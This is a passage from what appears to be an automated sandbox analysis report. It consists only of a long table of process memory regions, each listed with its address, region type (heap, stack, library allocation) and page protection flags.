page execute and read and write
|
||
207AD72C000
|
trusted library allocation
|
page read and write
|
||
1FB696A6000
|
heap
|
page read and write
|
||
7FFAAC7B0000
|
trusted library allocation
|
page execute and read and write
|
||
8F682FF000
|
stack
|
page read and write
|
||
1F1B2313000
|
heap
|
page read and write
|
||
24648960000
|
heap
|
page read and write
|
||
7FFB22785000
|
unkown
|
page readonly
|
||
D1F263E000
|
stack
|
page read and write
|
||
1FB696A6000
|
heap
|
page read and write
|
||
E61E1FF000
|
stack
|
page read and write
|
||
7FFAAC68D000
|
trusted library allocation
|
page execute and read and write
|
||
7FFAAC8F0000
|
trusted library allocation
|
page read and write
|
||
2285266F000
|
trusted library allocation
|
page read and write
|
||
7FFAAC8E0000
|
trusted library allocation
|
page read and write
|
||
178C1210000
|
heap
|
page read and write
|
||
7FFAAC831000
|
trusted library allocation
|
page read and write
|
||
207AA335000
|
heap
|
page read and write
|
||
7FFAAC69B000
|
trusted library allocation
|
page read and write
|
||
24E3A845000
|
heap
|
page read and write
|
||
2284ECE1000
|
heap
|
page read and write
|
||
46EDB7D000
|
stack
|
page read and write
|
||
8F6827F000
|
unkown
|
page read and write
|
||
1FB69631000
|
heap
|
page read and write
|
||
1FB696A6000
|
heap
|
page read and write
|
||
77E1DF7000
|
stack
|
page read and write
|
||
1F891350000
|
heap
|
page read and write
|
||
1FB69618000
|
heap
|
page read and write
|
||
1F1B230A000
|
heap
|
page read and write
|
||
7FFAAC684000
|
trusted library allocation
|
page read and write
|
||
4E3DFFF000
|
stack
|
page read and write
|
||
178C4A6F000
|
trusted library allocation
|
page read and write
|
||
207ABE80000
|
trusted library allocation
|
page read and write
|
||
7FFAAC8A0000
|
trusted library allocation
|
page read and write
|
||
1F1B230A000
|
heap
|
page read and write
|
||
22850AC5000
|
trusted library allocation
|
page read and write
|
||
2284EC51000
|
heap
|
page read and write
|
||
2284EC53000
|
heap
|
page read and write
|
||
22868E40000
|
heap
|
page execute and read and write
|
||
22868C13000
|
heap
|
page read and write
|
||
7FFB22760000
|
unkown
|
page readonly
|
||
7FFB23A72000
|
unkown
|
page readonly
|
||
207AA008000
|
heap
|
page read and write
|
||
1F1B23F0000
|
heap
|
page read and write
|
||
1D167FC0000
|
heap
|
page read and write
|
||
1B95671A000
|
heap
|
page read and write
|
||
207ADC9A000
|
trusted library allocation
|
page read and write
|
||
1F1B22C7000
|
heap
|
page read and write
|
||
7FFAAC970000
|
trusted library allocation
|
page read and write
|
||
1E4CEA60000
|
heap
|
page execute and read and write
|
||
1FB69689000
|
heap
|
page read and write
|
||
207C4140000
|
heap
|
page read and write
|
||
7FFAAC692000
|
trusted library allocation
|
page read and write
|
||
2284EBC0000
|
heap
|
page read and write
|
||
24648C6D000
|
heap
|
page read and write
|
||
1D167FC5000
|
heap
|
page read and write
|
||
1B956722000
|
heap
|
page read and write
|
||
24BB4EC0000
|
heap
|
page read and write
|
||
77E17EE000
|
stack
|
page read and write
|
||
1B9566C1000
|
heap
|
page read and write
|
||
7FFAAC9A0000
|
trusted library allocation
|
page read and write
|
||
7FFB23A66000
|
unkown
|
page readonly
|
||
4E3D9FF000
|
stack
|
page read and write
|
||
1B956712000
|
heap
|
page read and write
|
||
178C341C000
|
trusted library allocation
|
page read and write
|
||
178C3111000
|
heap
|
page read and write
|
||
207ABAB0000
|
heap
|
page read and write
|
||
7FFAAC830000
|
trusted library allocation
|
page read and write
|
||
1B95671E000
|
heap
|
page read and write
|
||
46EDF38000
|
stack
|
page read and write
|
||
207AB980000
|
heap
|
page read and write
|
||
7FFAAC740000
|
trusted library allocation
|
page read and write
|
||
7FFB23A69000
|
unkown
|
page readonly
|
||
21C7D766000
|
heap
|
page read and write
|
||
7FFAAC820000
|
trusted library allocation
|
page read and write
|
||
207AA0C4000
|
heap
|
page read and write
|
||
7FFAAC872000
|
trusted library allocation
|
page read and write
|
||
1E4E6A95000
|
heap
|
page read and write
|
||
1E4D030E000
|
trusted library allocation
|
page read and write
|
||
3CA680D000
|
stack
|
page read and write
|
||
1B9566F5000
|
heap
|
page read and write
|
||
4E3DCFE000
|
stack
|
page read and write
|
||
178C434B000
|
trusted library allocation
|
page read and write
|
||
7FFB22780000
|
unkown
|
page read and write
|
||
178C4AC0000
|
trusted library allocation
|
page read and write
|
||
178C3074000
|
heap
|
page read and write
|
||
178C47F4000
|
trusted library allocation
|
page read and write
|
||
7FFB22776000
|
unkown
|
page readonly
|
||
1FB694E0000
|
heap
|
page read and write
|
||
22868EE3000
|
heap
|
page read and write
|
||
77E1AFE000
|
stack
|
page read and write
|
||
7FFAAC8D0000
|
trusted library allocation
|
page read and write
|
||
7FFB1E0E0000
|
unkown
|
page readonly
|
||
22868C07000
|
heap
|
page read and write
|
||
7545FB000
|
stack
|
page read and write
|
||
1D167FEA000
|
heap
|
page read and write
|
||
1FB6964D000
|
heap
|
page read and write
|
||
7FFAAC930000
|
trusted library allocation
|
page read and write
|
||
1F89124F000
|
heap
|
page read and write
|
||
7FFAAC920000
|
trusted library allocation
|
page read and write
|
||
21C7D920000
|
heap
|
page read and write
|
||
1F1B22BB000
|
heap
|
page read and write
|
||
77E1B7B000
|
stack
|
page read and write
|
||
24E3A840000
|
heap
|
page read and write
|
||
207AA04F000
|
heap
|
page read and write
|
||
207C440B000
|
heap
|
page read and write
|
||
1B9566D6000
|
heap
|
page read and write
|
||
1FB6966E000
|
heap
|
page read and write
|
||
1E4E6D60000
|
heap
|
page read and write
|
||
1E4CE360000
|
trusted library allocation
|
page read and write
|
||
1F8912BC000
|
heap
|
page read and write
|
||
7FFAAC900000
|
trusted library allocation
|
page read and write
|
||
7FFAAC950000
|
trusted library allocation
|
page read and write
|
||
1F1B2303000
|
heap
|
page read and write
|
||
1E4E6DBB000
|
heap
|
page read and write
|
||
46EDFBF000
|
stack
|
page read and write
|
||
1D168190000
|
heap
|
page read and write
|
||
3CA68CF000
|
stack
|
page read and write
|
||
2285205F000
|
trusted library allocation
|
page read and write
|
||
7FFAAC682000
|
trusted library allocation
|
page read and write
|
||
207AD6C5000
|
trusted library allocation
|
page read and write
|
||
207C421D000
|
heap
|
page read and write
|
||
178C4A44000
|
trusted library allocation
|
page read and write
|
||
77E1F7F000
|
stack
|
page read and write
|
||
7FFB1E0F6000
|
unkown
|
page readonly
|
||
178C3040000
|
heap
|
page read and write
|
||
24BB4B80000
|
heap
|
page read and write
|
||
46ED7CE000
|
stack
|
page read and write
|
||
207C41C2000
|
heap
|
page read and write
|
||
1B9566FE000
|
heap
|
page read and write
|
||
178DB374000
|
heap
|
page read and write
|
||
1B956739000
|
heap
|
page read and write
|
||
E61E7FE000
|
stack
|
page read and write
|
||
D1F328E000
|
stack
|
page read and write
|
||
178C1190000
|
heap
|
page read and write
|
||
3CA577D000
|
stack
|
page read and write
|
||
1FB6CF10000
|
trusted library allocation
|
page read and write
|
||
7FFAAC850000
|
trusted library allocation
|
page execute and read and write
|
||
7FFAAC736000
|
trusted library allocation
|
page read and write
|
||
1E4CCA00000
|
heap
|
page read and write
|
||
178C304B000
|
heap
|
page read and write
|
||
D1F227D000
|
stack
|
page read and write
|
||
2284EE30000
|
trusted library allocation
|
page read and write
|
||
1F1B22CF000
|
heap
|
page read and write
|
||
1F1B5A30000
|
trusted library allocation
|
page read and write
|
||
1E4CEA71000
|
trusted library allocation
|
page read and write
|
||
7FFB1E0E1000
|
unkown
|
page execute read
|
||
77E1CFD000
|
stack
|
page read and write
|
||
207AA07C000
|
heap
|
page read and write
|
||
178C126E000
|
heap
|
page read and write
|
||
1E4E6DC6000
|
heap
|
page read and write
|
||
7FFAAC746000
|
trusted library allocation
|
page read and write
|
||
1FB6965F000
|
heap
|
page read and write
|
||
7FFB1E100000
|
unkown
|
page read and write
|
||
1F1B230A000
|
heap
|
page read and write
|
||
7FFAAC900000
|
trusted library allocation
|
page read and write
|
||
178DB362000
|
heap
|
page read and write
|
||
7FFAAC683000
|
trusted library allocation
|
page execute and read and write
|
||
22868EFA000
|
heap
|
page read and write
|
||
178C1130000
|
heap
|
page read and write
|
||
7FFAAC990000
|
trusted library allocation
|
page read and write
|
||
1B9566BC000
|
heap
|
page read and write
|
||
2284EC35000
|
heap
|
page read and write
|
||
3FFEFFE000
|
stack
|
page read and write
|
||
1F1B22EC000
|
heap
|
page read and write
|
||
46EE0BB000
|
stack
|
page read and write
|
||
207ADBD4000
|
trusted library allocation
|
page read and write
|
||
178D31F1000
|
trusted library allocation
|
page read and write
|
||
207C4397000
|
heap
|
page execute and read and write
|
||
1E4CE350000
|
heap
|
page readonly
|
||
1F1B22E7000
|
heap
|
page read and write
|
||
3CA587E000
|
stack
|
page read and write
|
||
1F89126B000
|
heap
|
page read and write
|
||
3FFEEFE000
|
stack
|
page read and write
|
||
207A9FD9000
|
heap
|
page read and write
|
||
7FFAAC8A0000
|
trusted library allocation
|
page read and write
|
||
207ABE50000
|
trusted library allocation
|
page read and write
|
||
7FFB1E105000
|
unkown
|
page readonly
|
||
207ACC62000
|
trusted library allocation
|
page read and write
|
||
7FFAAC83A000
|
trusted library allocation
|
page read and write
|
||
22850C7C000
|
trusted library allocation
|
page read and write
|
||
178C3265000
|
trusted library allocation
|
page read and write
|
||
24648AEE000
|
heap
|
page read and write
|
||
7FFAAC822000
|
trusted library allocation
|
page read and write
|
||
7FFAAC890000
|
trusted library allocation
|
page read and write
|
||
2464A590000
|
heap
|
page read and write
|
||
7FFAAC8F0000
|
trusted library allocation
|
page read and write
|
||
1FB6B004000
|
heap
|
page read and write
|
||
3CA53EF000
|
stack
|
page read and write
|
||
24BB4EC5000
|
heap
|
page read and write
|
||
E61E2FF000
|
stack
|
page read and write
|
||
178C125A000
|
heap
|
page read and write
|
||
1F1B2312000
|
heap
|
page read and write
|
||
7FFAAC940000
|
trusted library allocation
|
page read and write
|
||
1FB6B388000
|
heap
|
page read and write
|
||
7FFB22785000
|
unkown
|
page readonly
|
||
7FFB1E100000
|
unkown
|
page read and write
|
||
E19FBFE000
|
stack
|
page read and write
|
||
7FFAAC862000
|
trusted library allocation
|
page read and write
|
||
1F89128D000
|
heap
|
page read and write
|
||
24648AA7000
|
heap
|
page read and write
|
||
22868A83000
|
trusted library allocation
|
page read and write
|
||
7FFB23A51000
|
unkown
|
page execute read
|
||
1F1B2303000
|
heap
|
page read and write
|
||
77E1FFF000
|
stack
|
page read and write
|
||
7FFAAC8F0000
|
trusted library allocation
|
page read and write
|
||
207ABF10000
|
trusted library allocation
|
page read and write
|
||
178DB330000
|
heap
|
page read and write
|
||
1FB6965D000
|
heap
|
page read and write
|
||
7FFAAC8B0000
|
trusted library allocation
|
page read and write
|
||
178C47F8000
|
trusted library allocation
|
page read and write
|
||
1F891268000
|
heap
|
page read and write
|
||
1E4CCACE000
|
heap
|
page read and write
|
||
2284EE40000
|
heap
|
page readonly
|
||
1FB6B000000
|
heap
|
page read and write
|
||
E61E4FE000
|
stack
|
page read and write
|
||
7FFAAC870000
|
trusted library allocation
|
page execute and read and write
|
||
22850A51000
|
trusted library allocation
|
page read and write
|
||
7FFAAC980000
|
trusted library allocation
|
page read and write
|
||
1B956716000
|
heap
|
page read and write
|
||
7FFAAC910000
|
trusted library allocation
|
page read and write
|
||
207AD699000
|
trusted library allocation
|
page read and write
|
||
1B956722000
|
heap
|
page read and write
|
||
1D168037000
|
heap
|
page read and write
|
||
7FFAAC890000
|
trusted library allocation
|
page read and write
|
||
1F1B22E0000
|
heap
|
page read and write
|
||
207AD77F000
|
trusted library allocation
|
page read and write
|
||
1E4CCB66000
|
heap
|
page read and write
|
||
1E4D0079000
|
trusted library allocation
|
page read and write
|
||
1E4D0082000
|
trusted library allocation
|
page read and write
|
||
1FB69682000
|
heap
|
page read and write
|
||
7FFAAC740000
|
trusted library allocation
|
page execute and read and write
|
||
1E4CE74C000
|
heap
|
page read and write
|
||
1E4CCA05000
|
heap
|
page read and write
|
||
3CA5979000
|
stack
|
page read and write
|
||
1FB696A6000
|
heap
|
page read and write
|
||
7FFB2277D000
|
unkown
|
page readonly
|
||
7FFAAC8C0000
|
trusted library allocation
|
page read and write
|
||
24648C60000
|
heap
|
page read and write
|
||
3CA5CBB000
|
stack
|
page read and write
|
||
1FB696A6000
|
heap
|
page read and write
|
||
77E1EFA000
|
stack
|
page read and write
|
||
178C124E000
|
heap
|
page read and write
|
||
77E1BFE000
|
stack
|
page read and write
|
||
7FFAAC910000
|
trusted library allocation
|
page read and write
|
||
178C1258000
|
heap
|
page read and write
|
||
207BC0A0000
|
trusted library allocation
|
page read and write
|
||
7FFAAC69D000
|
trusted library allocation
|
page execute and read and write
|
||
1F1B22CE000
|
heap
|
page read and write
|
||
7FFAAC960000
|
trusted library allocation
|
page read and write
|
||
22852029000
|
trusted library allocation
|
page read and write
|
||
7FFAAC69B000
|
trusted library allocation
|
page read and write
|
||
46EEC4F000
|
stack
|
page read and write
|
||
3FFF2FE000
|
stack
|
page read and write
|
||
46EECCF000
|
stack
|
page read and write
|
||
207C43A0000
|
heap
|
page read and write
|
||
D1F22FE000
|
stack
|
page read and write
|
||
753DFE000
|
stack
|
page read and write
|
||
1D168012000
|
heap
|
page read and write
|
||
5B247FE000
|
stack
|
page read and write
|
||
24E3A578000
|
heap
|
page read and write
|
||
7FFB23A66000
|
unkown
|
page readonly
|
||
3CA694C000
|
stack
|
page read and write
|
||
7FFB23A70000
|
unkown
|
page read and write
|
||
22868D40000
|
heap
|
page read and write
|
||
24E3A530000
|
heap
|
page read and write
|
||
1E4CCA10000
|
heap
|
page read and write
|
||
1F8912B9000
|
heap
|
page read and write
|
||
1F1B23F4000
|
heap
|
page read and write
|
||
207C4226000
|
heap
|
page read and write
|
||
1E4CE700000
|
trusted library allocation
|
page read and write
|
||
1F1B230A000
|
heap
|
page read and write
|
||
3FFF1FF000
|
stack
|
page read and write
|
||
178C3067000
|
heap
|
page read and write
|
||
7DF41A480000
|
trusted library allocation
|
page execute and read and write
|
||
D1F320E000
|
stack
|
page read and write
|
||
7FFAAC8C0000
|
trusted library allocation
|
page read and write
|
||
1FB6CDF0000
|
heap
|
page read and write
|
||
46EDDBE000
|
stack
|
page read and write
|
||
1F1B230D000
|
heap
|
page read and write
|
||
7FFAAC97E000
|
trusted library allocation
|
page read and write
|
||
207AC000000
|
heap
|
page execute and read and write
|
||
1D167FBA000
|
heap
|
page read and write
|
||
178C4A8E000
|
trusted library allocation
|
page read and write
|
||
7FFB22780000
|
unkown
|
page read and write
|
||
1F1B21D0000
|
heap
|
page read and write
|
||
77E1A7D000
|
stack
|
page read and write
|
||
1D167FED000
|
heap
|
page read and write
|
||
207AD691000
|
trusted library allocation
|
page read and write
|
||
178C31F1000
|
trusted library allocation
|
page read and write
|
||
7FFAAC730000
|
trusted library allocation
|
page read and write
|
||
207A9F50000
|
heap
|
page read and write
|
||
1B9566F9000
|
heap
|
page read and write
|
||
21C7D840000
|
heap
|
page read and write
|
||
1D167FCF000
|
heap
|
page read and write
|
||
1B95671E000
|
heap
|
page read and write
|
||
1B956722000
|
heap
|
page read and write
|
||
1B9566ED000
|
heap
|
page read and write
|
||
1F1B231A000
|
heap
|
page read and write
|
||
1F1B230A000
|
heap
|
page read and write
|
||
21C7DAF0000
|
heap
|
page read and write
|
||
178C1218000
|
heap
|
page read and write
|
||
3CA670F000
|
stack
|
page read and write
|
||
2284EF40000
|
heap
|
page read and write
|
||
207C43AB000
|
heap
|
page read and write
|
||
D1F273C000
|
stack
|
page read and write
|
||
1D168120000
|
heap
|
page read and write
|
||
7FFAAC970000
|
trusted library allocation
|
page read and write
|
||
3CA57FE000
|
stack
|
page read and write
|
||
207AA078000
|
heap
|
page read and write
|
||
178C4836000
|
trusted library allocation
|
page read and write
|
||
21C7D740000
|
heap
|
page read and write
|
||
24E3A510000
|
heap
|
page read and write
|
||
178C4AC4000
|
trusted library allocation
|
page read and write
|
||
178C30FB000
|
heap
|
page read and write
|
||
1F1B2290000
|
heap
|
page read and write
|
||
178C14B0000
|
heap
|
page read and write
|
||
178C3124000
|
heap
|
page read and write
|
||
178C30A4000
|
heap
|
page read and write
|
||
22868F24000
|
heap
|
page read and write
|
||
7FFAAC831000
|
trusted library allocation
|
page read and write
|
||
1B9565D0000
|
heap
|
page read and write
|
||
1B956712000
|
heap
|
page read and write
|
||
7541FF000
|
stack
|
page read and write
|
||
3CA69CC000
|
stack
|
page read and write
|
||
E19FCFD000
|
stack
|
page read and write
|
||
46EEDCE000
|
stack
|
page read and write
|
||
7FFAAC940000
|
trusted library allocation
|
page read and write
|
||
1B95671E000
|
heap
|
page read and write
|
||
D0BF3F000
|
unkown
|
page read and write
|
||
7FFAAC73C000
|
trusted library allocation
|
page execute and read and write
|
||
1F1B22EF000
|
heap
|
page read and write
|
||
1E4D005F000
|
trusted library allocation
|
page read and write
|
||
178DB210000
|
heap
|
page read and write
|
||
1F89128D000
|
heap
|
page read and write
|
||
22868F46000
|
heap
|
page read and write
|
||
178C129A000
|
heap
|
page read and write
|
||
1FB69689000
|
heap
|
page read and write
|
||
24BB4B60000
|
heap
|
page read and write
|
||
1F1B22C7000
|
heap
|
page read and write
|
||
178C47CB000
|
trusted library allocation
|
page read and write
|
||
24648ADB000
|
heap
|
page read and write
|
||
7FFAAC8A0000
|
trusted library allocation
|
page read and write
|
||
207A9FD0000
|
heap
|
page read and write
|
||
2464A8E0000
|
heap
|
page read and write
|
||
7FFAAC970000
|
trusted library allocation
|
page read and write
|
||
2284EC9C000
|
heap
|
page read and write
|
||
24648AFD000
|
heap
|
page read and write
|
||
3CA56FE000
|
stack
|
page read and write
|
||
1E4D0047000
|
trusted library allocation
|
page read and write
|
||
7FFAAC84A000
|
trusted library allocation
|
page read and write
|
||
7FFAAC950000
|
trusted library allocation
|
page read and write
|
||
178D325E000
|
trusted library allocation
|
page read and write
|
||
207C4230000
|
heap
|
page read and write
|
||
178C309F000
|
heap
|
page read and write
|
||
207AD785000
|
trusted library allocation
|
page read and write
|
||
1F891210000
|
heap
|
page read and write
|
||
1E4D004B000
|
trusted library allocation
|
page read and write
|
||
77E16A5000
|
stack
|
page read and write
|
||
7FFAAC980000
|
trusted library allocation
|
page read and write
|
||
1F891240000
|
heap
|
page read and write
|
||
22860A61000
|
trusted library allocation
|
page read and write
|
||
1E4D02C3000
|
trusted library allocation
|
page read and write
|
||
1F89135D000
|
heap
|
page read and write
|
||
D1F344C000
|
stack
|
page read and write
|
||
178C3072000
|
heap
|
page read and write
|
||
178C125C000
|
heap
|
page read and write
|
||
207AA084000
|
heap
|
page read and write
|
||
1FB6968E000
|
heap
|
page read and write
|
||
22868AC1000
|
heap
|
page read and write
|
||
22852058000
|
trusted library allocation
|
page read and write
|
||
1FB69665000
|
heap
|
page read and write
|
||
1D167F50000
|
heap
|
page read and write
|
||
753CFD000
|
stack
|
page read and write
|
||
7FFB23A50000
|
unkown
|
page readonly
|
||
1FB695E0000
|
heap
|
page read and write
|
||
1FB6968D000
|
heap
|
page read and write
|
||
2284EC6F000
|
heap
|
page read and write
|
||
E19FDFE000
|
stack
|
page read and write
|
||
178C4D49000
|
trusted library allocation
|
page read and write
|
||
207BC040000
|
trusted library allocation
|
page read and write
|
||
178C31B6000
|
heap
|
page execute and read and write
|
||
24648AB1000
|
heap
|
page read and write
|
||
1FB69682000
|
heap
|
page read and write
|
||
7FFB1E0E0000
|
unkown
|
page readonly
|
||
1B95671A000
|
heap
|
page read and write
|
||
1F1B2312000
|
heap
|
page read and write
|
||
207AA096000
|
heap
|
page read and write
|
||
1FB6966B000
|
heap
|
page read and write
|
||
7FFB22760000
|
unkown
|
page readonly
|
||
7FFAAC9A0000
|
trusted library allocation
|
page read and write
|
||
7FFAAC9B0000
|
trusted library allocation
|
page read and write
|
||
1E4CE980000
|
heap
|
page execute and read and write
|
||
2284EB90000
|
heap
|
page read and write
|
||
7FFB23A50000
|
unkown
|
page readonly
|
||
1FB696A6000
|
heap
|
page read and write
|
||
1B9565A0000
|
heap
|
page read and write
|
||
1FB698A0000
|
heap
|
page read and write
|
||
1FB69689000
|
heap
|
page read and write
|
||
1FB6966D000
|
heap
|
page read and write
|
||
22852096000
|
trusted library allocation
|
page read and write
|
||
1D168012000
|
heap
|
page read and write
|
||
1E4CFDB1000
|
trusted library allocation
|
page read and write
|
||
7FFAAC906000
|
trusted library allocation
|
page read and write
|
||
1FB69646000
|
heap
|
page read and write
|
||
7FFAAC890000
|
trusted library allocation
|
page read and write
|
||
2284EE50000
|
trusted library allocation
|
page read and write
|
||
1B959DC0000
|
heap
|
page read and write
|
||
22869110000
|
heap
|
page read and write
|
||
7FFB22780000
|
unkown
|
page read and write
|
||
207ABAB5000
|
heap
|
page read and write
|
||
1F1B2470000
|
heap
|
page read and write
|
||
178C4AC8000
|
trusted library allocation
|
page read and write
|
||
77E1D79000
|
stack
|
page read and write
|
||
1FB69689000
|
heap
|
page read and write
|
||
7FFB22776000
|
unkown
|
page readonly
|
||
1E4D0690000
|
trusted library allocation
|
page read and write
|
||
1E4D00B8000
|
trusted library allocation
|
page read and write
|
||
1E4DEA71000
|
trusted library allocation
|
page read and write
|
||
1F1B21F0000
|
heap
|
page read and write
|
||
1F1B22B1000
|
heap
|
page read and write
|
||
1F1B4098000
|
heap
|
page read and write
|
||
228525A5000
|
trusted library allocation
|
page read and write
|
||
7FFAAC950000
|
trusted library allocation
|
page read and write
|
||
1F1B2312000
|
heap
|
page read and write
|
||
D1F25B9000
|
stack
|
page read and write
|
||
1FB698A5000
|
heap
|
page read and write
|
||
1F1B22EF000
|
heap
|
page read and write
|
||
1B95671A000
|
heap
|
page read and write
|
||
1F1B2303000
|
heap
|
page read and write
|
||
1F1B22DE000
|
heap
|
page read and write
|
||
178C30F8000
|
heap
|
page read and write
|
||
22852052000
|
trusted library allocation
|
page read and write
|
||
5B23D69000
|
stack
|
page read and write
|
||
7FFAAC850000
|
trusted library allocation
|
page execute and read and write
|
||
3CA678E000
|
stack
|
page read and write
|
||
1B9566D6000
|
heap
|
page read and write
|
||
1F1B4090000
|
heap
|
page read and write
|
||
D0BEB9000
|
stack
|
page read and write
|
||
7FFAAC766000
|
trusted library allocation
|
page execute and read and write
|
||
8F67FBB000
|
stack
|
page read and write
|
||
24E3A570000
|
heap
|
page read and write
|
||
207AD8CB000
|
trusted library allocation
|
page read and write
|
||
1B95671E000
|
heap
|
page read and write
|
||
2284EE76000
|
heap
|
page execute and read and write
|
||
22868C57000
|
heap
|
page read and write
|
||
1D167FC7000
|
heap
|
page read and write
|
||
4E3E1FE000
|
stack
|
page read and write
|
||
178C14A0000
|
trusted library allocation
|
page read and write
|
||
46EEE4D000
|
stack
|
page read and write
|
||
4E3DAFE000
|
stack
|
page read and write
|
||
7FFAAC84F000
|
trusted library allocation
|
page read and write
|
||
5B246FF000
|
stack
|
page read and write
|
||
1E4CC9D0000
|
heap
|
page read and write
|
||
1FACEB50000
|
heap
|
page read and write
|
||
1D167FC0000
|
heap
|
page read and write
|
||
21C7D940000
|
heap
|
page read and write
|
||
1F1B22EC000
|
heap
|
page read and write
|
||
207ABED3000
|
trusted library allocation
|
page read and write
|
||
207C43DE000
|
heap
|
page read and write
|
||
178C3100000
|
heap
|
page read and write
|
||
1B956694000
|
heap
|
page read and write
|
||
D1F334F000
|
stack
|
page read and write
|
||
207AD662000
|
trusted library allocation
|
page read and write
|
||
7FFAAC690000
|
trusted library allocation
|
page read and write
|
||
7FFAAC7A0000
|
trusted library allocation
|
page execute and read and write
|
||
7FFAAC74C000
|
trusted library allocation
|
page execute and read and write
|
||
3CA5C39000
|
stack
|
page read and write
|
||
1B95671A000
|
heap
|
page read and write
|
||
1FACEB54000
|
heap
|
page read and write
|
||
22860ACF000
|
trusted library allocation
|
page read and write
|
||
1F891355000
|
heap
|
page read and write
|
||
2284EF45000
|
heap
|
page read and write
|
||
1F1B2312000
|
heap
|
page read and write
|
||
77E172E000
|
stack
|
page read and write
|
||
7FFAAC840000
|
trusted library allocation
|
page execute and read and write
|
||
178DB3AC000
|
heap
|
page read and write
|
||
1F8912B9000
|
heap
|
page read and write
|
||
7543FD000
|
stack
|
page read and write
|
||
22868F00000
|
heap
|
page read and write
|
||
7FFAAC880000
|
trusted library allocation
|
page read and write
|
||
7FFB1E0F6000
|
unkown
|
page readonly
|
||
1B958378000
|
heap
|
page read and write
|
||
1F1B2315000
|
heap
|
page read and write
|
||
1F892FD0000
|
heap
|
page read and write
|
||
7FFAAC74C000
|
trusted library allocation
|
page execute and read and write
|
||
7FFAAC9C0000
|
trusted library allocation
|
page read and write
|
||
1B9566FB000
|
heap
|
page read and write
|
||
7FFAAC8B0000
|
trusted library allocation
|
page read and write
|
||
1B956712000
|
heap
|
page read and write
|
||
1B9566DD000
|
heap
|
page read and write
|
||
1E4E6B90000
|
heap
|
page read and write
|
||
1B956712000
|
heap
|
page read and write
|
||
7FFAAC960000
|
trusted library allocation
|
page read and write
|
||
1B95671E000
|
heap
|
page read and write
|
||
1F1B2329000
|
heap
|
page read and write
|
||
1F1B230A000
|
heap
|
page read and write
|
||
207C4407000
|
heap
|
page read and write
|
||
77E1E7E000
|
stack
|
page read and write
|
||
1F8911F0000
|
heap
|
page read and write
|
||
7FFAAC684000
|
trusted library allocation
|
page read and write
|
||
7FFAAC920000
|
trusted library allocation
|
page read and write
|
||
7FFAAC910000
|
trusted library allocation
|
page read and write
|
||
7FFAAC9D0000
|
trusted library allocation
|
page read and write
|
||
1FACEB30000
|
heap
|
page read and write
|
||
7FFAAC6AB000
|
trusted library allocation
|
page read and write
|
||
178DB33C000
|
heap
|
page read and write
|
||
7FFAAC820000
|
trusted library allocation
|
page read and write
|
||
D1F283B000
|
stack
|
page read and write
|
||
207AD6E7000
|
trusted library allocation
|
page read and write
|
||
1FB6965E000
|
heap
|
page read and write
|
||
1F1B22E9000
|
heap
|
page read and write
|
||
7FFB1E105000
|
unkown
|
page readonly
|
||
1F89126E000
|
heap
|
page read and write
|
||
1E4D0694000
|
trusted library allocation
|
page read and write
|
||
5B241FE000
|
stack
|
page read and write
|
||
7FFAAC8E0000
|
trusted library allocation
|
page read and write
|
||
E19FAFF000
|
stack
|
page read and write
|
||
22860C05000
|
trusted library allocation
|
page read and write
|
||
207AA0BE000
|
heap
|
page read and write
|
||
7FFAAC916000
|
trusted library allocation
|
page read and write
|
||
1E4E6AA4000
|
heap
|
page read and write
|
||
24E3A430000
|
heap
|
page read and write
|
||
7FFAAC930000
|
trusted library allocation
|
page read and write
|
||
1FB6962C000
|
heap
|
page read and write
|
||
7FFAAC730000
|
trusted library allocation
|
page read and write
|
||
4E3DEFF000
|
stack
|
page read and write
|
||
1E4D0349000
|
trusted library allocation
|
page read and write
|
||
E61E5FE000
|
stack
|
page read and write
|
||
22868F35000
|
heap
|
page read and write
|
||
178C4AD5000
|
trusted library allocation
|
page read and write
|
||
207AD8F7000
|
trusted library allocation
|
page read and write
|
||
7FFB23A75000
|
unkown
|
page readonly
|
||
7FFAAC740000
|
trusted library allocation
|
page execute and read and write
|
||
7FFAAC682000
|
trusted library allocation
|
page read and write
|
||
87359CE000
|
unkown
|
page read and write
|
||
7FFB1E0F6000
|
unkown
|
page readonly
|
||
1FACEBD8000
|
heap
|
page read and write
|
||
178C11D0000
|
trusted library allocation
|
page read and write
|
||
1FB69682000
|
heap
|
page read and write
|
||
207AD6E5000
|
trusted library allocation
|
page read and write
|
||
7FFAAC990000
|
trusted library allocation
|
page read and write
|
||
1B95671E000
|
heap
|
page read and write
|
||
7FFB23A50000
|
unkown
|
page readonly
|
||
1E4CCAF5000
|
heap
|
page read and write
|
||
22868C85000
|
heap
|
page read and write
|
||
7FFAAC8C0000
|
trusted library allocation
|
page read and write
|
||
207AC262000
|
trusted library allocation
|
page read and write
|
||
1FB69610000
|
heap
|
page read and write
|
||
5B245FE000
|
stack
|
page read and write
|
||
1FB69689000
|
heap
|
page read and write
|
||
1D167FCF000
|
heap
|
page read and write
|
||
7FFAAC910000
|
trusted library allocation
|
page read and write
|
||
207AD6A1000
|
trusted library allocation
|
page read and write
|
||
1FB6966B000
|
heap
|
page read and write
|
||
D1F21FE000
|
stack
|
page read and write
|
||
7FFB22782000
|
unkown
|
page readonly
|
||
207C4260000
|
heap
|
page execute and read and write
|
||
1FB696A6000
|
heap
|
page read and write
|
||
7FFAAC6AB000
|
trusted library allocation
|
page read and write
|
||
1E4CE380000
|
heap
|
page read and write
|
||
7FFAAC9E0000
|
trusted library allocation
|
page read and write
|
||
7FFAAC69D000
|
trusted library allocation
|
page execute and read and write
|
||
7FFAAC97C000
|
trusted library allocation
|
page read and write
|
||
22868EE9000
|
heap
|
page read and write
|
||
178C1150000
|
heap
|
page read and write
|
||
178DB300000
|
heap
|
page execute and read and write
|
||
228522C9000
|
trusted library allocation
|
page read and write
|
||
E61E8FF000
|
stack
|
page read and write
|
||
178C4E13000
|
trusted library allocation
|
page read and write
|
||
1F891240000
|
heap
|
page read and write
|
||
7FFAAC6A0000
|
trusted library allocation
|
page read and write
|
||
E19F6FE000
|
stack
|
page read and write
|
||
7FFB1E0E0000
|
unkown
|
page readonly
|
||
46EDD79000
|
stack
|
page read and write
|
||
7FFAAC9B0000
|
trusted library allocation
|
page read and write
|
||
1D168195000
|
heap
|
page read and write
|
||
7FFAAC746000
|
trusted library allocation
|
page read and write
|
||
46EEC0D000
|
stack
|
page read and write
|
||
3CA5A3C000
|
stack
|
page read and write
|
||
2284EC4F000
|
heap
|
page read and write
|
||
7FFB22776000
|
unkown
|
page readonly
|
||
1F1B22EA000
|
heap
|
page read and write
|
||
1E4CE860000
|
heap
|
page read and write
|
||
1E4D05CA000
|
trusted library allocation
|
page read and write
|
||
1F89128D000
|
heap
|
page read and write
|
||
1FB69631000
|
heap
|
page read and write
|
||
178C2B53000
